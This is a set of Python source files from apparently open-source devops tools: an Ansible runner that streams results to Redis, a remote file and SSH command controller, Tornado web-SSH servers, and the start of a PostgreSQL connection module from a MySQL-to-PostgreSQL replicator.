[{"hostname": "10.0.0.0", "port": "22", "username": "test", "password": "<PASSWORD>"}, ...]
"""
self.resource = resource
self.inventory = Inventory(loader=loader, variable_manager=variable_manager, host_list=[])
self.dynamic_inventory()
def add_dynamic_group(self, hosts, groupname, groupvars=None):
"""
add hosts to a group
"""
my_group = Group(name=groupname)
# if group variables exists, add them to group
if groupvars:
            for key, value in groupvars.items():
my_group.set_variable(key, value)
# add hosts to group
for host in hosts:
# set connection variables
hostname = host.get("hostname")
hostip = host.get('ip', hostname)
hostport = host.get("port")
username = host.get("username")
password = host.get("password")
ssh_key = host.get("ssh_key")
my_host = Host(name=hostname, port=hostport)
my_host.set_variable('ansible_ssh_host', hostip)
my_host.set_variable('ansible_ssh_port', hostport)
my_host.set_variable('ansible_ssh_user', username)
my_host.set_variable('ansible_ssh_pass', password)
my_host.set_variable('ansible_ssh_private_key_file', ssh_key)
# set other variables
for key, value in host.items():
if key not in ["hostname", "port", "username", "password"]:
my_host.set_variable(key, value)
# add to group
my_group.add_host(my_host)
self.inventory.add_group(my_group)
def dynamic_inventory(self):
"""
add hosts to inventory.
"""
if isinstance(self.resource, list):
self.add_dynamic_group(self.resource, 'default_group')
elif isinstance(self.resource, dict):
for groupname, hosts_and_vars in self.resource.iteritems():
self.add_dynamic_group(hosts_and_vars.get("hosts"), groupname, hosts_and_vars.get("vars"))
class ModelResultsCollector(CallbackBase):
def __init__(self, *args, **kwargs):
super(ModelResultsCollector, self).__init__(*args, **kwargs)
self.host_ok = {}
self.host_unreachable = {}
self.host_failed = {}
def v2_runner_on_unreachable(self, result):
self.host_unreachable[result._host.get_name()] = result
def v2_runner_on_ok(self, result, *args, **kwargs):
self.host_ok[result._host.get_name()] = result
def v2_runner_on_failed(self, result, *args, **kwargs):
self.host_failed[result._host.get_name()] = result
class ModelResultsCollectorToRedis(CallbackBase):
def __init__(self, redisKey, *args, **kwargs):
super(ModelResultsCollectorToRedis, self).__init__(*args, **kwargs)
self.host_ok = {}
self.host_unreachable = {}
self.host_failed = {}
self.redisKey = redisKey
def v2_runner_on_unreachable(self, result):
for remove_key in ('changed', 'invocation'):
if remove_key in result._result:
del result._result[remove_key]
data = "{host} | UNREACHABLE! => {stdout}".format(host=result._host.get_name(),
stdout=json.dumps(result._result, indent=4))
r.lpush(self.redisKey, data)
def v2_runner_on_ok(self, result, *args, **kwargs):
self.host_ok[result._host.get_name()] = result
for remove_key in ('changed', 'invocation'):
if remove_key in result._result:
del result._result[remove_key]
if 'rc' in result._result and 'stdout' in result._result:
data = "{host} | SUCCESS | rc={rc} >> \n{stdout}".format(host=result._host.get_name(),
rc=result._result.get('rc'),
stdout=result._result.get('stdout'))
else:
data = "{host} | SUCCESS >> {stdout}".format(host=result._host.get_name(),
stdout=json.dumps(result._result, indent=4))
# print data
r.lpush(self.redisKey, data)
def v2_runner_on_failed(self, result, *args, **kwargs):
for remove_key in ('changed', 'invocation'):
if remove_key in result._result:
del result._result[remove_key]
if 'rc' in result._result and 'stdout' in result._result:
data = "{host} | FAILED | rc={rc} >> \n{stdout}".format(host=result._host.get_name(),
rc=result._result.get('rc'),
stdout=result._result.get('stdout'))
else:
data = "{host} | FAILED! => {stdout}".format(host=result._host.get_name(),
stdout=json.dumps(result._result, indent=4))
r.lpush(self.redisKey, data)
class PlayBookResultsCollectorToRedis(CallbackBase):
CALLBACK_VERSION = 2.0
def __init__(self, redisKey, *args, **kwargs):
super(PlayBookResultsCollectorToRedis, self).__init__(*args, **kwargs)
self.task_ok = {}
self.task_skipped = {}
self.task_failed = {}
self.task_status = {}
self.task_unreachable = {}
self.task_changed = {}
self.redisKey = redisKey
def v2_runner_on_ok(self, result, *args, **kwargs):
self.task_ok[result._host.get_name()] = result._result
delegated_vars = result._result.get('_ansible_delegated_vars', None)
if result._task.action in ('include', 'include_role'):
return
elif result._result.get('changed', False):
if delegated_vars:
msg = "changed: [%s -> %s]" % (result._host.get_name(), delegated_vars['ansible_host'])
else:
msg = "changed: [%s]" % result._host.get_name()
else:
if delegated_vars:
msg = "ok: [%s -> %s]" % (result._host.get_name(), delegated_vars['ansible_host'])
else:
msg = "ok: [%s]" % result._host.get_name()
r.lpush(self.redisKey, msg)
def v2_runner_on_failed(self, result, *args, **kwargs):
delegated_vars = result._result.get('_ansible_delegated_vars', None)
self.task_failed[result._host.get_name()] = result._result
if delegated_vars:
msg = "fatal: [{host} -> {delegated_vars}]: FAILED! => {msg}".format(host=result._host.get_name(),
delegated_vars=delegated_vars[
'ansible_host'],
msg=json.dumps(result._result))
else:
msg = "fatal: [{host}]: FAILED! => {msg}".format(host=result._host.get_name(),
msg=json.dumps(result._result))
r.lpush(self.redisKey, msg)
def v2_runner_on_unreachable(self, result):
self.task_unreachable[result._host.get_name()] = result._result
msg = "fatal: [{host}]: UNREACHABLE! => {msg}\n".format(host=result._host.get_name(),
msg=json.dumps(result._result))
r.lpush(self.redisKey, msg)
def v2_runner_on_changed(self, result):
self.task_changed[result._host.get_name()] = result._result
msg = "changed: [{host}]\n".format(host=result._host.get_name())
r.lpush(self.redisKey, msg)
def v2_runner_on_skipped(self, result):
self.task_ok[result._host.get_name()] = result._result
msg = "skipped: [{host}]\n".format(host=result._host.get_name())
r.lpush(self.redisKey, msg)
def v2_playbook_on_play_start(self, play):
name = play.get_name().strip()
if not name:
msg = u"PLAY"
else:
msg = u"PLAY [%s] " % name
if len(msg) < 80: msg = msg + '*' * (79 - len(msg))
r.lpush(self.redisKey, msg)
def _print_task_banner(self, task):
msg = "\nTASK [%s] " % (task.get_name().strip())
if len(msg) < 80: msg = msg + '*' * (80 - len(msg))
r.lpush(self.redisKey, msg)
# args = ''
# if not task.no_log and C.DISPLAY_ARGS_TO_STDOUT:
# args = u', '.join(u'%s=%s' % a for a in task.args.items())
# args = u' %s' % args
# print u"\nTASK [%s%s]" % (task.get_name().strip(), args)
def v2_playbook_on_task_start(self, task, is_conditional):
self._print_task_banner(task)
def v2_playbook_on_cleanup_task_start(self, task):
msg = "CLEANUP TASK [%s]" % task.get_name().strip()
r.lpush(self.redisKey, msg)
def v2_playbook_on_handler_task_start(self, task):
msg = "RUNNING HANDLER [%s]" % task.get_name().strip()
r.lpush(self.redisKey, msg)
def v2_playbook_on_stats(self, stats):
msg = "\nPLAY RECAP *********************************************************************"
r.lpush(self.redisKey, msg)
hosts = sorted(stats.processed.keys())
for h in hosts:
t = stats.summarize(h)
self.task_status[h] = {
"ok": t['ok'],
"changed": t['changed'],
"unreachable": t['unreachable'],
"skipped": t['skipped'],
"failed": t['failures']
}
msg = "{host}\t\t: ok={ok}\tchanged={changed}\tunreachable={unreachable}\tskipped={skipped}\tfailed={failed}".format(
host=h, ok=t['ok'], changed=t['changed'],
unreachable=t['unreachable'],
skipped=t["skipped"], failed=t['failures']
)
r.lpush(self.redisKey, msg)
def v2_runner_item_on_ok(self, result):
delegated_vars = result._result.get('_ansible_delegated_vars', None)
if result._task.action in ('include', 'include_role'):
return
elif result._result.get('changed', False):
msg = 'changed'
else:
msg = 'ok'
if delegated_vars:
msg += ": [%s -> %s]" % (result._host.get_name(), delegated_vars['ansible_host'])
else:
msg += ": [%s]" % result._host.get_name()
msg += " => (item=%s)" % (json.dumps(self._get_item(result._result)))
if (
self._display.verbosity > 0 or '_ansible_verbose_always' in result._result) and not '_ansible_verbose_override' in result._result:
msg += " => %s" % json.dumps(result._result)
r.lpush(self.redisKey, msg)
def v2_runner_item_on_failed(self, result):
delegated_vars = result._result.get('_ansible_delegated_vars', None)
msg = "failed: "
if delegated_vars:
msg += "[%s -> %s]" % (result._host.get_name(), delegated_vars['ansible_host'])
else:
msg += "[%s]" % (result._host.get_name())
msg = msg + " (item=%s) => %s\n" % (self._get_item(json.dumps(result._result)), json.dumps(result._result)),
r.lpush(self.redisKey, msg)
def v2_runner_item_on_skipped(self, result):
msg = "skipping: [%s] => (item=%s) " % (result._host.get_name(), self._get_item(result._result))
if (
self._display.verbosity > 0 or '_ansible_verbose_always' in result._result) and not '_ansible_verbose_override' in result._result:
msg += " => %s" % json.dumps(result._result)
r.lpush(self.redisKey, msg)
def v2_runner_retry(self, result):
task_name = result.task_name or result._task
msg = "FAILED - RETRYING: %s (%d retries left)." % (
task_name, result._result['retries'] - result._result['attempts'])
if (
self._display.verbosity > 2 or '_ansible_verbose_always' in result._result) and not '_ansible_verbose_override' in result._result:
msg += "Result was: %s" % json.dumps(result._result, indent=4)
r.lpush(self.redisKey, msg)
class PlayBookResultsCollector(CallbackBase):
CALLBACK_VERSION = 2.0
def __init__(self, *args, **kwargs):
super(PlayBookResultsCollector, self).__init__(*args, **kwargs)
self.task_ok = {}
self.task_changed = {}
self.task_skipped = {}
self.task_failed = {}
self.task_status = {}
self.task_unreachable = {}
def v2_runner_on_ok(self, result, *args, **kwargs):
self.task_ok[result._host.get_name()] = result._result
def v2_runner_on_changed(self, result):
self.task_changed[result._host.get_name()] = result._result
def v2_runner_on_failed(self, result, *args, **kwargs):
self.task_failed[result._host.get_name()] = result._result
def v2_runner_on_unreachable(self, result):
self.task_unreachable[result._host.get_name()] = result._result
def v2_runner_on_skipped(self, result):
self.task_ok[result._host.get_name()] = result._result
def v2_playbook_on_stats(self, stats):
hosts = sorted(stats.processed.keys())
for h in hosts:
t = stats.summarize(h)
self.task_status[h] = {
"ok": t['ok'],
"changed": t['changed'],
"unreachable": t['unreachable'],
"skipped": t['skipped'],
"failed": t['failures']
}
class ANSRunner(object):
"""
This is a General object for parallel execute modules.
"""
def __init__(self, resource, redisKey=None, *args, **kwargs):
self.resource = resource
# self.host_list = '/etc/ansible/ansible_hosts'
self.inventory = None
self.variable_manager = None
self.loader = None
self.options = None
self.passwords = None
self.callback = None
self.__initializeData()
self.results_raw = {}
self.redisKey = redisKey
def __initializeData(self):
""" 初始化ansible """
Options = namedtuple('Options', ['connection', 'module_path', 'forks', 'timeout', 'remote_user',
'ask_pass', 'private_key_file', 'ssh_common_args', 'ssh_extra_args',
'sftp_extra_args',
'scp_extra_args', 'become', 'become_method', 'become_user', 'ask_value_pass',
'verbosity',
'check', 'listhosts', 'listtasks', 'listtags', 'syntax'])
self.variable_manager = VariableManager()
self.loader = DataLoader()
self.options = Options(connection='smart', module_path=None, forks=100, timeout=10,
remote_user='root', ask_pass=False, private_key_file=None, ssh_common_args=None,
ssh_extra_args=None,
sftp_extra_args=None, scp_extra_args=None, become=None, become_method=None,
become_user='root', ask_value_pass=False, verbosity=None, check=False, listhosts=False,
listtasks=False, listtags=False, syntax=False)
self.passwords = dict(sshpass=None, becomepass=None)
self.inventory = MyInventory(self.resource, self.loader, self.variable_manager).inventory
# self.inventory = Inventory(loader=self.loader,variable_manager=self.variable_manager,host_list=self.host_list)
self.variable_manager.set_inventory(self.inventory)
def run_model(self, host_list, module_name, module_args):
"""
run module from andible ad-hoc.
module_name: ansible module_name
module_args: ansible module args
"""
play_source = dict(
name="Ansible Play",
hosts=host_list,
gather_facts='no',
tasks=[dict(action=dict(module=module_name, args=module_args))]
)
play = Play().load(play_source, variable_manager=self.variable_manager, loader=self.loader)
tqm = None
if self.redisKey:
self.callback = ModelResultsCollectorToRedis(self.redisKey)
else:
self.callback = ModelResultsCollector()
try:
tqm = TaskQueueManager(
inventory=self.inventory,
variable_manager=self.variable_manager,
loader=self.loader,
options=self.options,
passwords=self.passwords,
)
tqm._stdout_callback = self.callback
tqm.run(play)
# print self.callback.host_ok.items()
# for host, result in self.callback.host_ok.items():
# print host,result._result
finally:
if tqm is not None:
tqm.cleanup()
def run_playbook(self, host_list,playbook_path, extra_vars=None):
"""
run ansible palybook
"""
try:
if self.redisKey:
self.callback = PlayBookResultsCollectorToRedis(self.redisKey)
# self.callback = mycallback()
else:
# self.callback = mycallback()
self.callback = PlayBookResultsCollector()
if extra_vars: self.variable_manager.extra_vars = extra_vars
executor = PlaybookExecutor(
playbooks=[playbook_path], inventory=self.inventory, variable_manager=self.variable_manager,
loader=self.loader,
options=self.options, passwords=self.passwords,
)
# self.results_callback=mycallback()
executor._tqm._stdout_callback = self.callback
try:
result = executor.run()
# for host, a in self.callback.task_ok.items():
# print host,a,'447'
except Exception as e:
print e
# return result,self.callback
# results = self.callback.results
except Exception as e:
# return False
print e
def get_model_result(self):
self.results_raw = {'success': {}, 'failed': {}, 'unreachable': {}}
for host, result in self.callback.host_ok.items():
self.results_raw['success'][host] = result._result
for host, result in self.callback.host_failed.items():
self.results_raw['failed'][host] = result._result
for host, result in self.callback.host_unreachable.items():
self.results_raw['unreachable'][host] = result._result
return json.dumps(self.results_raw)
def get_playbook_result(self):
self.results_raw = {'skipped': {}, 'failed': {}, 'ok': {}, "status": {}, 'unreachable': {}, "changed": {}}
for host, result in self.callback.task_ok.items():
self.results_raw['ok'][host] = result
for host, result in self.callback.task_failed.items():
self.results_raw['failed'][host] = result
for host, result in self.callback.task_status.items():
self.results_raw['status'][host] = result
for host, result in self.callback.task_changed.items():
self.results_raw['changed'][host] = result
for host, result in self.callback.task_skipped.items():
self.results_raw['skipped'][host] = result
for host, result in self.callback.task_unreachable.items():
self.results_raw['unreachable'][host] = result
return self.results_raw
def handle_cmdb_data(self, data):
'''Process the facts returned by ansible's setup module and build the CMDB records'''
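# Expected input (illustrative): the JSON string produced by get_model_result() after a
# "setup" run, e.g. '{"success": {"10.0.0.11": {"ansible_facts": {...}}}, "failed": {}, "unreachable": {}}'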
data_list = []
for k, v in json.loads(data).items():
if k == "success":
for x, y in v.items():
cmdb_data = {}
data = y.get('ansible_facts')
disk_size = 0
cpu = data['ansible_processor'][-1]
for k, v in data['ansible_devices'].items():
if k[0:2] in ['sd', 'hd', 'ss', 'vd']:
disk = int((int(v.get('sectors')) * int(v.get('sectorsize'))) / 1024 / 1024 / 1024)
disk_size = disk_size + disk
cmdb_data['serial'] = data['ansible_product_serial'].split()[0]
cmdb_data['ip'] = x
cmdb_data['cpu'] = cpu.replace('@', '')
ram_total = str(data['ansible_memtotal_mb'])
if len(ram_total) == 4:
ram_total = ram_total[0] + 'GB'
elif len(ram_total) == 5:
ram_total = ram_total[0:2] + 'GB'
elif len(ram_total) > 5:
ram_total = ram_total[0:3] + 'GB'
else:
ram_total = ram_total + 'MB'
cmdb_data['ram_total'] = ram_total
cmdb_data['disk_total'] = str(disk_size) + 'GB'
cmdb_data['system'] = data['ansible_distribution'] + ' ' + data[
'ansible_distribution_version'] + ' ' + data['ansible_userspace_bits']
cmdb_data['model'] = data['ansible_product_name'].split(':')[0]
cmdb_data['cpu_number'] = data['ansible_processor_count']
cmdb_data['vcpu_number'] = data['ansible_processor_vcpus']
cmdb_data['cpu_core'] = data['ansible_processor_cores']
cmdb_data['hostname'] = data['ansible_hostname']
cmdb_data['kernel'] = str(data['ansible_kernel'])
cmdb_data['manufacturer'] = data['ansible_system_vendor']
if data['ansible_selinux']:
cmdb_data['selinux'] = data['ansible_selinux'].get('status')
else:
cmdb_data['selinux'] = 'disabled'
cmdb_data['swap'] = str(data['ansible_swaptotal_mb']) + 'MB'
cmdb_data['status'] = 0
data_list.append(cmdb_data)
elif k == "unreachable":
for x, y in v.items():
cmdb_data = {}
cmdb_data['status'] = 1
cmdb_data['ip'] = x
data_list.append(cmdb_data)
if data_list:
return data_list
else:
return False
def handle_cmdb_crawHw_data(self, data):
data_list = []
for k, v in json.loads(data).items():
if k == "success":
for x, y in v.items():
cmdb_data = {}
cmdb_data['ip'] = x
data = y.get('ansible_facts')
cmdb_data['mem_info'] = data.get('ansible_mem_detailed_info')
cmdb_data['disk_info'] = data.get('ansible_disk_detailed_info')
data_list.append(cmdb_data)
if data_list:
return data_list
else:
return False
def handle_model_data(self, data, module_name, module_args=None):
'''Process the output of an ansible module run'''
module_data = json.loads(data)
failed = module_data.get('failed')
success = module_data.get('success')
unreachable = module_data.get('unreachable')
data_list = []
if module_name == "raw":
if failed:
for x, y in failed.items():
data = {}
data['ip'] = x
try:
data['msg'] = y.get('stdout').replace('\t\t', '<br>').replace('\r\n', '<br>').replace('\t',
'<br>')
except:
data['msg'] = None
if y.get('rc') == 0:
data['status'] = 'succeed'
else:
data['status'] = 'failed'
data_list.append(data)
elif success:
for x, y in success.items():
data = {}
data['ip'] = x
try:
data['msg'] = y.get('stdout').replace('\t\t', '<br>').replace('\r\n', '<br>').replace('\t',
'<br>')
except:
data['msg'] = None
if y.get('rc') == 0:
data['status'] = 'succeed'
else:
data['status'] = 'failed'
data_list.append(data)
elif module_name == "ping":
if success:
for x, y in success.items():
data = {}
data['ip'] = x
if y.get('ping'):
data['msg'] = y.get('ping')
data['status'] = 'succeed'
data_list.append(data)
else:
if success:
for x, y in success.items():
data = {}
data['ip'] = x
if y.get('invocation'):
data['msg'] = "Ansible %s with %s execute success." % (module_name, module_args)
data['status'] = 'succeed'
data_list.append(data)
elif failed:
for x, y in failed.items():
data = {}
data['ip'] = x
data['msg'] = y.get('msg')
data['status'] = 'failed'
data_list.append(data)
if unreachable:
for x, y in unreachable.items():
data = {}
data['ip'] = x
data['msg'] = y.get('msg')
data['status'] = 'failed'
data_list.append(data)
if data_list:
return data_list
else:
return False
if __name__ == '__main__':
"""
When using the dynamic inventory, the dict format lets you define custom groups; the hosts: entry of your yml file must reference a group name defined in this py file.
"""
# ---
# - name: create user
# hosts: heihei
# user: root
# gather_facts: false
# vars:
# - user: "test"
# tasks:
# - name: create user
# user: name="{{ user }}"
# resource = {
# "heihei":{
# "hosts":[{"hostname": "172.16.17.32","port": 22,"username": 'root',"password": '<PASSWORD>'},{"hostname": "172.16.17.32","port": 22,"username": 'root',"password": '<PASSWORD>'}],
# "vars": {
# "var1": "heihei",
# }
# }
# }
"""
Alternatively you can pass a plain list with the host info, but then the yml hosts: name must be "default_group"; everything else stays the same.
"""
resource = [
{"hostname": "172.16.17.32","port": 22,"username": 'root',"password": '<PASSWORD>'},
# {"hostname": "172.16.17.32","port": 22,"username": 'root',"password": '<PASSWORD>'}
]
# resource = ["172.16.17.32"]
rbt = ANSRunner(resource, redisKey='<KEY>')
rbt.run_model(host_list=["172.16.17.32"], module_name='setup',module_args="")
# rbt.run_playbook(['172.16.17.32','172.16.17.32'],playbook_path='/Users/wupeijin/code3/django-tornado/upload/playbook/1.yml',extra_vars='')
# result = rbt.get_playbook_result()
a = rbt.get_model_result()
print rbt.handle_cmdb_data(a)
# print a
# print result
```
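The `*ToRedis` callbacks above stream each formatted output line into a Redis list with `lpush(redisKey, ...)`. A hedged sketch of how a consumer could drain that list; the connection parameters, key name and polling loop are illustrative assumptions, not part of the project:
```python
# Hedged sketch: draining the lines that the *ToRedis callbacks push with r.lpush(redisKey, line).
# Connection parameters and the polling loop are assumptions for illustration only.
import time
import redis

def drain_task_output(redis_key, host='127.0.0.1', port=6379, timeout=30):
    r = redis.StrictRedis(host=host, port=port, db=0)
    deadline = time.time() + timeout
    lines = []
    while time.time() < deadline:
        raw = r.rpop(redis_key)          # lpush + rpop gives rough FIFO ordering
        if raw is None:
            time.sleep(0.5)
            continue
        lines.append(raw.decode() if isinstance(raw, bytes) else raw)
    return lines
```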
#### File: ops/views/remote_file.py
```python
import sys, json, os, re,redis
from .. import ssh_settings
from ssh_error import SSHError
from ssh_file_transfer import SSHFileTransfer
from ssh_module_controller import SSHControler
r = redis.StrictRedis(host=ssh_settings.redisip, port=ssh_settings.redisport, db=0)
class RemoteFile(object):
def __init__(self):
pass
def add_remote_file(self,path='', description='', server='', id='', ip=''):
ssh_info = {"status": False, "content": ""}
try:
data = {"path": path, "description": description, "server": server, "id": id,
"ip": ip}
data = json.dumps(data, encoding="utf8", ensure_ascii=False)
r.hset("remotefilelist", id, data)
ssh_info["tid"] = id
ssh_info["status"] = True
except Exception as e:
ssh_info["status"] = False
ssh_info["content"] = str(e)
return ssh_info
def get_remote_file_list(self):
ssh_info = {"status": False, "content": ""}
try:
data = r.hgetall("remotefilelist")
print data
info = {}
for id in data.keys():
tmp = json.loads(data[id])
info[id] = tmp
ssh_info["content"] = info
ssh_info["status"] = True
except Exception as e:
ssh_info["status"] = False
ssh_info["content"] = str(e)
return ssh_info
def delete_remote_file_list(self, id):
ssh_info = {"status": False, "content": ""}
try:
data = r.hdel("remotefilelist", id)
ssh_info["status"] = True
except Exception as e:
ssh_info["status"] = False
ssh_info["content"] = str(e)
return ssh_info
def remote_file_content(self, id, action, file_content=""):
ssh_info = {"status": False, "content": ""}
try:
data = RemoteFile().get_remote_file_list()
if not data["status"]: raise SSHError(data["content"])
content = data["content"]
path = content[id]["path"]
path = re.sub(" ", "", path)
ip = content[id]["ip"]
host_info = SSHControler().convert_id_to_ip(ip)
if not host_info["status"]: raise SSHError(host_info["content"])
host = host_info["content"]
sftp = SSHFileTransfer()
login = sftp.login(**host)
if not login["status"]: raise SSHError(login["content"])
if action == "GET":
ssh_info = sftp.get_filecontent(path)
elif action == "WRITE":
ssh_info = sftp.write_filecontent(path, file_content)
else:
raise SSHError("remotefilelist")
except Exception as e:
ssh_info["status"] = False
ssh_info["content"] = str(e)
return ssh_info
```
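`RemoteFile` above keeps each entry as a JSON document inside the Redis hash `remotefilelist`, keyed by its id. A hedged, self-contained sketch of that layout (connection parameters and field values are illustrative):
```python
# Hedged sketch of the storage layout used by RemoteFile: one JSON blob per entry
# in the Redis hash "remotefilelist", keyed by id. All values below are illustrative.
import json
import redis

r = redis.StrictRedis(host='127.0.0.1', port=6379, db=0)

entry = {"path": "/etc/nginx/nginx.conf", "description": "nginx main config",
         "server": "web01", "id": "1", "ip": "10.0.0.11"}
r.hset("remotefilelist", entry["id"], json.dumps(entry))

# Reading everything back mirrors get_remote_file_list()
stored = dict((k, json.loads(v)) for k, v in r.hgetall("remotefilelist").items())
```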
#### File: ops/views/ssh_module_controller.py
```python
import os,sys,json,redis
from ssh import SSH_SSH
from ssh_error import SSHError
import threading
import ssh_settings
r = redis.StrictRedis(host=ssh_settings.redisip, port=ssh_settings.redisport, db=0)
class SSHControler(object):
def __init__(self):
self.SSH = SSH_SSH()
def controler_center(self, parameter={}):
cmd = parameter.get("cmd", False)
tid = parameter["tid"]
pass
def connect(self, ip=""):
ssh_info = {"content": "", "status": False}
try:
server_config = self.convert_id_to_ip(ip)
# print server_config
if not server_config["status"]: raise SSHError(server_config["content"])
if server_config["status"]:
ssh_info = self.SSH.login(**server_config["content"])
else:
ssh_info["content"] = server_config["content"]
except Exception as e:
print "ssh错误", str(e)
ssh_info["content"] = str(e)
ssh_info["status"] = False
return ssh_info
def command_controler(self, tid='', cmd='', ip=""):
log_name = "log.%s.%s" % (tid, ip)
log_content = {
"content": "",
"stage": "done",
"status": False,
}
ssh_info = {"content": "", "status": False}
try:
current = "current.%s" % tid
data = self.connect(ip=ip)
if data["status"]:
ssh = data["content"] ###登录界面
self.SSH.execute(cmd=cmd, ip=ip, tid=tid)
ssh_info["status"] = True
else:
raise SSHError(data["content"])
except Exception as e:
print "程序错误", e,'controller'
log_content["content"] = str(e)
log_content = json.dumps(log_content, encoding="utf8", ensure_ascii=False)
r.rpush(log_name, log_content)
ssh_info["content"] = str(e)
ssh_info["status"] = False
print ssh_info,'60'
r.incr(current)
return ssh_info
# @staticmethod
def convert_id_to_ip(self,ip=""):
ssh_info = {"status": False, "content": "指定的ID不存在"}
try:
servers_list = r.lrange("server", 0, -1)
if servers_list is None:
pass
else:
for _line in servers_list:
line = json.loads(_line)
if str(ip) == line["ip"]:
ssh_info["content"] = line
ssh_info["status"] = True
break
except Exception as e:
ssh_info["status"] = False
ssh_info["content"] = str(e)
return ssh_info
```
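`convert_id_to_ip()` above resolves a host by scanning the Redis list `server`, where each element is a JSON document carrying at least an `ip` field (the remaining fields are whatever `SSH_SSH.login()` expects). A hedged sketch of that lookup against an illustrative entry:
```python
# Hedged sketch of the "server" list contract assumed by convert_id_to_ip().
# Only the "ip" field is confirmed by the code above; the other fields are illustrative.
import json
import redis

r = redis.StrictRedis(host='127.0.0.1', port=6379, db=0)
r.rpush("server", json.dumps({"ip": "10.0.0.11", "port": 22, "username": "root"}))

def find_server(ip):
    for raw in r.lrange("server", 0, -1):
        line = json.loads(raw)
        if line["ip"] == str(ip):
            return line
    return None
```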
#### File: devops/webssh/main.py
```python
import os.path
import tornado.ioloop
import tornado.web
import tornado.httpserver
import tornado.options
from tornado.options import options
from config import init_config
from ioloop import IOLoop
import tornado.wsgi,logging
import tornado.websocket
import django.core.handlers.wsgi
from daemon import Bridge
from data import ClientData
from utils import check_ip, check_port
settings = dict(
template_path=os.path.join(os.path.dirname(__file__), "../templates"),
static_path=os.path.join(os.path.dirname(__file__), "../static"),
debug=True,
)
class Application(tornado.web.Application):
def __init__(self):
tornado.web.Application.__init__(self, handlers, **settings)
class IndexHandler(tornado.web.RequestHandler):
def get(self):
self.render("test1.html")
class WSHandler(tornado.websocket.WebSocketHandler):
clients = dict()
def check_origin(self, origin):
return True
def get_client(self):
return self.clients.get(self._id(), None)
def put_client(self):
bridge = Bridge(self)
self.clients[self._id()] = bridge
def remove_client(self):
bridge = self.get_client()
if bridge:
bridge.destroy()
del self.clients[self._id()]
@staticmethod
def _check_init_param(data):
return check_ip(data["hostname"]) and check_port(data["port"])
@staticmethod
def _is_init_data(data):
return data.get_type() == 'init'
def _id(self):
return id(self)
def open(self):
self.put_client()
def on_message(self, message):
# print message
bridge = self.get_client()
# logging.info(' bridge client :%s' % bridge)
client_data = ClientData(message)
if self._is_init_data(client_data):
if self._check_init_param(client_data.data):
bridge.open(client_data.data)
logging.info('connection established from: %s' % self._id())
else:
self.remove_client()
logging.warning('init param invalid: %s' % client_data.data)
else:
if bridge:
bridge.trans_forward(client_data.data)
def on_close(self):
self.remove_client()
logging.info('client close the connection: %s' % self._id())
def main():
init_config()
options.parse_config_file("webssh.conf")
wsgi_app = tornado.wsgi.WSGIContainer(
django.core.handlers.wsgi.WSGIHandler())
tornado_app = tornado.web.Application(
[
(r"/", IndexHandler),
(r"/ws", WSHandler),
('.*', tornado.web.FallbackHandler, dict(fallback=wsgi_app)),
],**settings)
http_server = tornado.httpserver.HTTPServer(tornado_app)
http_server.listen(options.port)
IOLoop.instance().start()
tornado.ioloop.IOLoop.instance().start()
if __name__ == "__main__":
main()
```
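`main()` reads its runtime settings from `webssh.conf` via `tornado.options.parse_config_file`; such files are evaluated as plain Python assignments. A minimal assumed example (only `port` is implied by the code, `logging` is a standard tornado option):
```python
# webssh.conf -- assumed example; tornado options files are plain Python assignments
port = 8002
logging = "info"
```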
#### File: jinjin123/devops2.0/run_tornado.py
```python
from tornado.options import options, define, parse_command_line
import sys,os,json,subprocess
import base64,logging
import tornado.httpserver
import tornado.ioloop
import tornado.wsgi
import tornado.web
import tornado.websocket
from daemon import Bridge
from data import ClientData
from utils import check_ip, check_port
import django.core.handlers.wsgi
define('port', type=int, default=8002)
class IndexHandler(tornado.web.RequestHandler):
def get(self):
self.render("test1.html")
class WSHandler(tornado.websocket.WebSocketHandler):
clients = dict()
def get_client(self):
return self.clients.get(self._id(), None)
def put_client(self):
bridge = Bridge(self)
self.clients[self._id()] = bridge
def remove_client(self):
bridge = self.get_client()
if bridge:
bridge.destroy()
del self.clients[self._id()]
@staticmethod
def _check_init_param(data):
return check_ip(data["hostname"]) and check_port(data["port"])
@staticmethod
def _is_init_data(data):
return data.get_type() == 'init'
def _id(self):
return id(self)
def open(self):
self.put_client()
def on_message(self, message):
bridge = self.get_client()
# logging.info(' bridge client :%s' % bridge)
client_data = ClientData(message)
if self._is_init_data(client_data):
if self._check_init_param(client_data.data):
bridge.open(client_data.data)
logging.info('connection established from: %s' % self._id())
else:
self.remove_client()
logging.warning('init param invalid: %s' % client_data.data)
else:
if bridge:
bridge.trans_forward(client_data.data)
def on_close(self):
self.remove_client()
logging.info('client close the connection: %s' % self._id())
settings = {
"template_path":os.path.join(os.path.dirname(__file__),"../devops/templates"),
"static_path":os.path.join(os.path.dirname(__file__),"../devops/static"),
}
def main():
# os.environ['DJANGO_SETTINGS_MODULE'] = 'devops.settings' # TODO: edit this
# sys.path.append('./devops') # path to your project if needed
parse_command_line()
options.parse_config_file("webssh.conf")
#wsgi_app = get_wsgi_application()
#container = tornado.wsgi.WSGIContainer(wsgi_app)
wsgi_app = tornado.wsgi.WSGIContainer(
django.core.handlers.wsgi.WSGIHandler())
tornado_app = tornado.web.Application(
[
(r"/", IndexHandler),
(r"/ws", WSHandler),
('.*', tornado.web.FallbackHandler, dict(fallback=wsgi_app)),
],**settings)
server = tornado.httpserver.HTTPServer(tornado_app)
server.listen(options.port)
tornado.ioloop.IOLoop.instance().start()
if __name__ == '__main__':
main()
``` |
{
"source": "jinjin123/switch-mysql-postgresql",
"score": 3
} |
#### File: pg_chameleon/lib/pg_lib.py
```python
import psycopg2
import os
import io
import sys
import json
import datetime
import decimal
import time
import base64
class pg_encoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime.time) or isinstance(obj, datetime.datetime) or isinstance(obj, datetime.date) or isinstance(obj, decimal.Decimal) or isinstance(obj, datetime.timedelta):
return str(obj)
return json.JSONEncoder.default(self, obj)
class pg_connection(object):
def __init__(self, global_config):
self.global_conf=global_config
self.pg_conn=self.global_conf.pg_conn
self.pg_database=self.global_conf.pg_database
self.dest_schema=self.global_conf.my_database
self.pg_connection=None
self.pg_cursor=None
self.pg_charset=self.global_conf.pg_charset
def connect_db(self):
"""
Connects to PostgreSQL using the parameters stored in pg_pars, built by adding the key dbname to the self.pg_conn dictionary.
After connecting, the method creates a database cursor and sets the session to autocommit.
"""
pg_pars=dict(list(self.pg_conn.items())+ list({'dbname':self.pg_database}.items()))
strconn="dbname=%(dbname)s user=%(user)s host=%(host)s password=%(<PASSWORD> port=%(port)s" % pg_pars
self.pgsql_conn = psycopg2.connect(strconn)
